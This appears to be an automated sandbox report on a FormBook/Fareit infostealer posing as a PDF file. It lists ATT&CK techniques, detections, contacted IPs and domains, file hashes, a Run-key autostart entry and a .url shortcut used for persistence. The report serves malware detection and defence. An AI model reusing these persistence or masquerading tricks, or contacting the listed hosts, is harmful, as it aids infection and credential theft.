Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA, 10_2_03595784
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: GetLocaleInfoA, 10_2_0359A3F4
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: LdrInitializeThunk,GetLocaleInfoA, 10_2_0359A440
Queries the cryptographic machine GUID
Source: C:\Users\user\Contacts\Wkklnmcz.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality to query local / system time
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_0040A39C GetLocalTime, 0_2_0040A39C
Contains functionality to query windows version
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_004605D0 GetVersion, 0_2_004605D0

Stealing of Sensitive Information:

Yara detected FormBook

Remote Access Functionality:

Yara detected FormBook

Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Valid Accounts | Native API 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 2 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Shared Modules 1 | Application Shimming 1 | Application Shimming 1 | Obfuscated Files or Information 1 2 | LSASS Memory | File and Directory Discovery 1 | Remote Desktop Protocol | Screen Capture 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Registry Run Keys / Startup Folder 1 | Process Injection 11 1 2 | Software Packing 1 | Security Account Manager | System Information Discovery 1 1 5 | SMB/Windows Admin Shares | Input Capture 2 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 1 | DLL Side-Loading 1 | NTDS | Security Software Discovery 2 3 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 4 | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 1 1 | LSA Secrets | Virtualization/Sandbox Evasion 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 2 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 11 1 2 | DCSync | Application Window Discovery 1 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Rundll32 1 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |

Behavior Graph

[Behavior graph not reproduced. Behavior Graph ID: 532011, Sample: DOC209272621615.PDF.exe, Startdate: 01/12/2021, Architecture: WINDOWS, Score: 100]

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source Detection Scanner Label Link
DOC209272621615.PDF.exe 33% ReversingLabs Win32.Infostealer.Fareit

Dropped Files

Source Detection Scanner Label Link
C:\Users\user\Contacts\Wkklnmcz.exe 33% ReversingLabs Win32.Infostealer.Fareit

Unpacked PE Files

Source Detection Scanner Label Link
12.0.mobsync.exe.72480000.2.unpack 100% Avira TR/Crypt.ZPACK.Gen
7.0.logagent.exe.72480000.1.unpack 100% Avira TR/Crypt.ZPACK.Gen
12.0.mobsync.exe.72480000.3.unpack 100% Avira TR/Crypt.ZPACK.Gen
0.2.DOC209272621615.PDF.exe.3590000.2.unpack 100% Avira TR/Hijacker.Gen
12.0.mobsync.exe.72480000.1.unpack 100% Avira TR/Crypt.ZPACK.Gen
7.0.logagent.exe.72480000.3.unpack 100% Avira TR/Crypt.ZPACK.Gen
6.2.Wkklnmcz.exe.3450000.2.unpack 100% Avira TR/Hijacker.Gen
10.2.Wkklnmcz.exe.72480000.3.unpack 100% Avira TR/Crypt.ZPACK.Gen
0.0.DOC209272621615.PDF.exe.3590000.3.unpack 100% Avira TR/Hijacker.Gen
12.0.mobsync.exe.72480000.0.unpack 100% Avira TR/Crypt.ZPACK.Gen
7.0.logagent.exe.72480000.0.unpack 100% Avira TR/Crypt.ZPACK.Gen
12.2.mobsync.exe.72480000.3.unpack 100% Avira TR/Crypt.ZPACK.Gen
6.2.Wkklnmcz.exe.72480000.3.unpack 100% Avira TR/Crypt.ZPACK.Gen
0.0.DOC209272621615.PDF.exe.3590000.6.unpack 100% Avira TR/Hijacker.Gen
10.2.Wkklnmcz.exe.3590000.2.unpack 100% Avira TR/Hijacker.Gen
7.2.logagent.exe.72480000.4.unpack 100% Avira TR/Crypt.ZPACK.Gen
7.0.logagent.exe.72480000.2.unpack 100% Avira TR/Crypt.ZPACK.Gen

Domains

URLs


Domains and IPs

Contacted Domains


Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

IP Domain Country Flag ASN ASN Name Malicious
198.54.117.217 unknown United States 22612 NAMECHEAP-NETUS true
86.105.245.69 www.neema.xyz Netherlands 20857 TRANSIP-ASAmsterdamtheNetherlandsNL false
156.235.157.134 www.meishangtianhua.com Seychelles 134548 DXTL-HKDXTLTseungKwanOServiceHK false
15.197.142.173 localproperty.team United States 7430 TANDEMUS false
163.44.239.73 sumikkoremon.com Japan 7506 INTERQGMOInternetIncJP false
165.32.109.217 www.era636.com United States 37053 RSAWEB-ASZA false
156.67.222.132 tourbox.xyz Cyprus 47583 AS-HOSTINGERLT false
66.235.200.145 cis136-tgarza.com United States 13335 CLOUDFLARENETUS false
162.159.130.233 unknown United States 13335 CLOUDFLARENETUS false
162.159.129.233 cdn.discordapp.com United States 13335 CLOUDFLARENETUS false
64.69.40.19 www.hwkm.net United States 35916 MULTA-ASN1US false
154.81.158.75 www.hbjngs.com Seychelles 8100 ASN-QUADRANET-GLOBALUS false
198.54.117.211 parkingpage.namecheap.com United States 22612 NAMECHEAP-NETUS false
68.70.164.19 jardingenesis.com United States 22458 NETSOURCEUS false
197.248.5.16 finetipster.com Kenya 37061 SafaricomKE false
2.57.90.16 sa-pontianak.com Lithuania 47583 AS-HOSTINGERLT false
23.224.31.114 nc1cname.com United States 40065 CNSERVERSUS false

Private

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 532011
Start date: 01.12.2021
Start time: 16:21:59
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 34s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: DOC209272621615.PDF.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@17/11@23/18
EGA Information: Failed
HDC Information:
• Successful, ratio: 23.9% (good quality ratio 21.8%)
• Quality average: 76.7%
• Quality standard deviation: 29.5%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 132
• Number of non-executed functions: 377
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
• Override analysis time to 240s for rundll32
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.20
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/532011/sample/DOC209272621615.PDF.exe

Simulations

Behavior and APIs

Time Type Description
16:22:55 API Interceptor 1x Sleep call for process: DOC209272621615.PDF.exe modified
16:23:02 Autostart Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wkklnmcz C:\Users\user\Contacts\zcmnlkkW.url
16:23:11 Autostart Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wkklnmcz C:\Users\user\Contacts\zcmnlkkW.url
16:23:14 API Interceptor 2x Sleep call for process: Wkklnmcz.exe modified
16:23:14 API Interceptor 1x Sleep call for process: WerFault.exe modified

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DOC209272621615._dfc05767de3ae9a241916a7c856d74a109742f3_39720528_0adf49ee\Report.wer

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.172817276835062
Encrypted: false
SSDEEP: 192:bdErVAFNHFHxPYMjSEPcuHC/u7sSS274ItvZ:xYyFV1xPYMj3C/u7sSX4ItB
MD5: 67C856C81C8C00A19732CA1C3FBB8BFC
SHA1: A5B6F506BF5A1AA766EE532DAE289A6A8B754CC0
SHA-256: C92D5B5D5E300423586921D6B9654D73D8ECDF316E6D4995EFF5D7C5EF800578
SHA-512: 6A1E9920221DCC0D7DB366069E5FC8A4023F9BC0B340B2BD54F1D685A1C437B74207AADD061D274845D79554DD56222E548877A902F0A1F0778F83B8607774A7
Malicious: false
Reputation: unknown
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2119.tmp.dmp

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Thu Dec 2 00:23:06 2021, 0x1205a4 type
Category: dropped
Size (bytes): 120426
Entropy (8bit): 2.0636676014152053
Encrypted: false
SSDEEP: 384:9vgwczhU5K2DZ2ZkIOZX6DZki9MPQPs6X32D55sgNjIRPLlYg664jKtZd:CF2DZ2ZkIOZX6DiCdskw5HGPLX6JKL
MD5: 663BECCAC70FA7C88880231814447373
SHA1: A36AE9F778210AA52549200041E4F52CC30DDA5C
SHA-256: AD8603B705A86E063EBF6FA9211B868EBF1F8387160E381346A5070403C7DBE5
SHA-512: 5DEC87AA08B8AEEDCE57752B1E4B37F87DDD76A1E2038978985C3DF6711F7E1155C0E49B8F6A87294925331D49CAC3864C7BEB3301E543A70213A2097B8DB07D
Malicious: false
Reputation: unknown
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CD2.tmp.WERInternalMetadata.xml

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 8424
Entropy (8bit): 3.699598642610419
Encrypted: false
SSDEEP: 192:Rrl7r3GLNi6665JmF6YFMSUvWSgmfg08SECprr89bmb3sf4Ajm:RrlsNi/65J06YOSUvWSgmfg08Swmb8f6
MD5: 282DF6263DDA26E340A7AFA81DB39F02
SHA1: F34242AD4067BC40A70EE15A99E1ADFE2967E666
SHA-256: D985E53F28B2D3141BE37D7DA1D6F603F5398DF515FE41243897E980072F9B3C
SHA-512: BCB1AD6C73C74E07C1C8A77B574B9E522150D365AB50C8421C8336790A05CFDF6A899C405460597326EE741F4E899DD03CD0061260FF59223CA315DF27432A67
Malicious: false
Reputation: unknown
                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F53.tmp.xml


                                                                            Process: C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type: XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category: dropped
                                                                            Size (bytes): 4715
                                                                            Entropy (8bit): 4.492705837037102
                                                                            Encrypted: false
                                                                            SSDEEP: 48:cvIwSD8zsNJgtWI95YVSWSC8B78fm8M4Jo0W/6Fo+q8v5W/8BoT4TXd:uITfnmYVzSNCJMfKs8B0EXd
                                                                            MD5: 71E889F4BA80EAC9303B9FAB96948441
                                                                            SHA1: 7CAA447935232F98A6C61BE5A40F3B89F0E6C5E7
                                                                            SHA-256: F68A97CD565BCB7F22276EC45507945CEF37773304D232AD2CC8CDD5FBF18AAE
                                                                            SHA-512: 41A7C71E08EB22FA8CA283425E78B2FD877BF1633FB9C1A93357F5E4F6BF0936B228946114E76805B420C13FE10D7D4A1C353E2AC0CC57E0EFC597DF8186CD49
                                                                            Malicious: false
                                                                            Reputation: unknown
                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279293" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Wkklnmczcyrsyafzucgflytssyuynbb[1]


                                                                            Process: C:\Users\user\Desktop\DOC209272621615.PDF.exe
                                                                            File Type: data
                                                                            Category: dropped
                                                                            Size (bytes): 281088
                                                                            Entropy (8bit): 7.986323718936903
                                                                            Encrypted: false
                                                                            SSDEEP: 6144:sMdqsz3mu4D3PNRXDdZf0lxKJuimC+jNeAmyGNktPKFsn:se37SzTdZf0qJONXmyGkyE
                                                                            MD5: 95C7205834A4A92A4F9BFC212C2326DC
                                                                            SHA1: 80A86D2BB252876D296C56B0F12CFCD28901819D
                                                                            SHA-256: 349D10CB526E22AF2138861D8B96082CC68D6E56AC188FFC80D844361CB8E4F8
                                                                            SHA-512: 4561CE75B68091DCBAEB84B259329C03BE564C98968261AB37FA6786F4731147F966D82D97AC32A5600C8B312B95A3F262F94F475EEFA864DBAE31C980F73660
                                                                            Malicious: false
                                                                            Reputation: unknown
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Wkklnmczcyrsyafzucgflytssyuynbb[1]


                                                                            Process: C:\Users\user\Contacts\Wkklnmcz.exe
                                                                            File Type: data
                                                                            Category: dropped
                                                                            Size (bytes): 281088
                                                                            Entropy (8bit): 7.986323718936903
                                                                            Encrypted: false
                                                                            SSDEEP: 6144:sMdqsz3mu4D3PNRXDdZf0lxKJuimC+jNeAmyGNktPKFsn:se37SzTdZf0qJONXmyGkyE
                                                                            MD5: 95C7205834A4A92A4F9BFC212C2326DC
                                                                            SHA1: 80A86D2BB252876D296C56B0F12CFCD28901819D
                                                                            SHA-256: 349D10CB526E22AF2138861D8B96082CC68D6E56AC188FFC80D844361CB8E4F8
                                                                            SHA-512: 4561CE75B68091DCBAEB84B259329C03BE564C98968261AB37FA6786F4731147F966D82D97AC32A5600C8B312B95A3F262F94F475EEFA864DBAE31C980F73660
                                                                            Malicious: false
                                                                            Reputation: unknown
                                                                            C:\Users\user\Contacts\Wkklnmcz.exe


                                                                            Process: C:\Users\user\Desktop\DOC209272621615.PDF.exe
                                                                            File Type: PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category: dropped
                                                                            Size (bytes): 701952
                                                                            Entropy (8bit): 6.590546616206496
                                                                            Encrypted: false
                                                                            SSDEEP: 12288:4e7bzFk/k/JOcISOgk3CTMI5a5+a1nWO4YghWxdESUyo2XMw:4sOsRkSOgk3ClO+EWO4YQOESUD2Xx
                                                                            MD5: E5D9DB9823FB854169E25FCECA42E804
                                                                            SHA1: 9982908B8DCDDD6EF44D80E0F6491AD87B80E53D
                                                                            SHA-256: DBE703A0B4D7694E0D05D6A1F5F8C8BBAE4A8D6B5ACBA1238DA5B2F523FA9565
                                                                            SHA-512: 4E97B9BE7970D84272570CE16B835F6A9262A72D72895C573C9A1A572A63436876195520F0D43594947A1C05378B41582F377A663D3B99E0B0FAEF829984FD13
                                                                            Malicious: true
                                                                            Yara Hits:
                                                                            • Rule: Typical_Malware_String_Transforms, Description: Detects typical strings in a reversed or otherwise modified form, Source: C:\Users\user\Contacts\Wkklnmcz.exe, Author: Florian Roth
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 33%
                                                                            Reputation: unknown
                                                                            Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................@...................@...........................p..v&...0..........................pe..................................................`w...............................text...P........................... ..`.itext.............................. ..`.data...L........ ..................@....bss.....7...0....... ...................idata..v&...p...(... ..............@....tls....4............H...................rdata...............H..............@..@.reloc..pe.......f...J..............@..B.rsrc........0......................@..@.............@......................@..@................................................................................................
                                                                            C:\Users\user\Contacts\Wkklnmcz.exe:Zone.Identifier


                                                                            Process: C:\Users\user\Desktop\DOC209272621615.PDF.exe
                                                                            File Type: ASCII text, with CRLF line terminators
                                                                            Category: dropped
                                                                            Size (bytes): 26
                                                                            Entropy (8bit): 3.95006375643621
                                                                            Encrypted: false
                                                                            SSDEEP: 3:ggPYV:rPYV
                                                                            MD5: 187F488E27DB4AF347237FE461A079AD
                                                                            SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious: true
                                                                            Reputation: unknown
                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                            C:\Users\user\Contacts\zcmnlkkW.url


                                                                            Process: C:\Users\user\Desktop\DOC209272621615.PDF.exe
                                                                            File Type: MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\user\\Contacts\\Wkklnmcz.exe">), ASCII text, with CRLF line terminators
                                                                            Category: modified
                                                                            Size (bytes): 87
                                                                            Entropy (8bit): 4.82862772603408
                                                                            Encrypted: false
                                                                            SSDEEP: 3:HRAbABGQYmTWAX+T+Bf5rim8G8EovsGKd/L:HRYFVmTWD0p+Guvsb/L
                                                                            MD5: E66B29629A1706E8ECE47AA28FF39F76
                                                                            SHA1: FE837862F5A9191FFD162B07CCD61A22E6F74ACF
                                                                            SHA-256: EFC81521919F35F95E729D57EB09C0FC1BD98D0051A38F6D840352C82CE33CE1
                                                                            SHA-512: 288EFA77E04CD1C5D234302A1AFB90EC49CA0F6A7045B8D1BBD203FBBBC93F5FE69581207D46A7B7F5C99DAC83F4450A41274C0FB1A99BFDD2D3EC156AF6F00D
                                                                            Malicious: false
                                                                            Yara Hits:
                                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\Contacts\zcmnlkkW.url, Author: @itsreallynick (Nick Carr)
                                                                            Reputation: unknown
                                                                            Preview: [InternetShortcut]..URL=file:"C:\\Users\\user\\Contacts\\Wkklnmcz.exe"..IconIndex=77..
                                                                            C:\Windows\appcompat\Programs\Amcache.hve


                                                                            Process: C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type: MS Windows registry file, NT/2000 or above
                                                                            Category: dropped
                                                                            Size (bytes): 1572864
                                                                            Entropy (8bit): 4.276700509440336
                                                                            Encrypted: false
                                                                            SSDEEP: 12288:gJ6Gt/hhQfY3KVkugoy3oU7YeE3wYt10WDOFd+r8CVJo1hn4kJvYLGr:q6Gt/hhQfY3KVk1mqr
                                                                            MD5: 0A199F48A50113B6CCF560EAEE40110A
                                                                            SHA1: 48ABA7820246D8BF372C253EAEEC8CC81EC61144
                                                                            SHA-256: 3EFF7BB80835626DDF199FA1E48BD4F094CD69C8B539FD9B40B5A04F91D9A698
                                                                            SHA-512: CABE59B303A038417A8647DEAF63C14675B2098BE43D59258C1E2C78FB52E39FE4AF74F2CC9F12269F9537B0F63F831439E99A4D59970DAAB50353AF98AF5301
                                                                            Malicious: false
                                                                            Reputation: unknown
                                                                            Preview: regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1


                                                                            Process: C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type: MS Windows registry file, NT/2000 or above
                                                                            Category: dropped
                                                                            Size (bytes): 24576
                                                                            Entropy (8bit): 4.001404213710496
                                                                            Encrypted: false
                                                                            SSDEEP: 384:ovujWT5Rftx1yPJ4XpQFFn+7kVPBqXNSeq5QMVyiy+/Xl4Lk4BZd1DoXzne+CX8W:iu4Rftx1oJ4XKFF+7qBqXMeq5QMVyiyf
                                                                            MD5: DF5DE94921A5EE2BDC5D1A4AB525CB47
                                                                            SHA1: 9D9678124F22733A616535C97B113D3E136BAF31
                                                                            SHA-256: 4229E63DDB16729A95F6F6A2FE8F9A11AC8F2B0BD8F0235522D3EE5CA88C7375
                                                                            SHA-512: 22C0091F5A87085FE964D7DB5271084E89FA4FA7F7B85CF7D90A460B8D80AA4D2FB1899ACCE87D03CC92B28F1CCDC499F885F62492AC6DD7AB6E696EF63CF0E0
                                                                            Malicious: false
                                                                            Reputation: unknown
                                                                            Preview: regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm......................................................................................................................................................................................................................................................................................................................................................HvLE.^......Y...........W.BJ..N].<.............0................... ..hbin................p.\..,..........nk,.............8........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ............. ........................... .......Z.......................Root........lf......Root....nk ..4.......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

                                                                            Static File Info

                                                                            General

                                                                            File type: PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit): 6.590546616206496
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.38%
                                                                            • InstallShield setup (43055/19) 0.43%
                                                                            • Windows Screen Saver (13104/52) 0.13%
                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            File name: DOC209272621615.PDF.exe
                                                                            File size: 701952
                                                                            MD5: e5d9db9823fb854169e25fceca42e804
                                                                            SHA1: 9982908b8dcddd6ef44d80e0f6491ad87b80e53d
                                                                            SHA256: dbe703a0b4d7694e0d05d6a1f5f8c8bbae4a8d6b5acba1238da5b2f523fa9565
                                                                            SHA512: 4e97b9be7970d84272570ce16b835f6a9262a72d72895c573c9a1a572a63436876195520f0d43594947a1c05378b41582f377a663d3b99e0b0faef829984fd13
                                                                            SSDEEP: 12288:4e7bzFk/k/JOcISOgk3CTMI5a5+a1nWO4YghWxdESUyo2XMw:4sOsRkSOgk3ClO+EWO4YQOESUD2Xx
                                                                            File Content Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                            File Icon

                                                                            Icon Hash: 3670910284e2d9b0

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint: 0x460bbc
                                                                            Entrypoint Section: .itext
                                                                            Digitally signed: false
                                                                            Imagebase: 0x400000
                                                                            Subsystem: windows gui
                                                                            Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                            DLL Characteristics:
                                                                            Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major: 4
                                                                            OS Version Minor: 0
                                                                            File Version Major: 4
                                                                            File Version Minor: 0
                                                                            Subsystem Version Major: 4
                                                                            Subsystem Version Minor: 0
                                                                            Import Hash: dd63229d7f836c6d43eb2d74e621d69e

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            add esp, FFFFFFF0h
                                                                            mov eax, 0045FAD8h
                                                                            call 00007F7E50BF6FADh
                                                                            nop
                                                                            nop
                                                                            nop
                                                                            nop
                                                                            nop
                                                                            nop
                                                                            mov eax, dword ptr [00462DA4h]
                                                                            mov eax, dword ptr [eax]
                                                                            call 00007F7E50C47573h
                                                                            mov ecx, dword ptr [00462F30h]
                                                                            mov eax, dword ptr [00462DA4h]
                                                                            mov eax, dword ptr [eax]
                                                                            mov edx, dword ptr [0045F8B0h]
                                                                            call 00007F7E50C47573h
                                                                            mov eax, dword ptr [00462DA4h]
                                                                            mov eax, dword ptr [eax]
                                                                            call 00007F7E50C475E7h
                                                                            call 00007F7E50BF4CF6h
                                                                            nop
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            Name                                  Virtual Address  Virtual Size  Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT          0x67000          0x2676        .idata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE        0x73000          0x40600       .rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC       0x6c000          0x6570        .reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS             0x6b000          0x18          .rdata
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT             0x67760          0x5f8         .idata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                            Sections

                                                                            Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                                                                            .text   0x1000           0x5ed50       0x5ee00   False     0.533486186594   data       6.56814798318  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .itext  0x60000          0xc08         0xe00     False     0.53515625       data       5.68696230909  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .data   0x61000          0x1f4c        0x2000    False     0.402465820312   data       3.88111147395  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                            .bss    0x63000          0x37a4        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
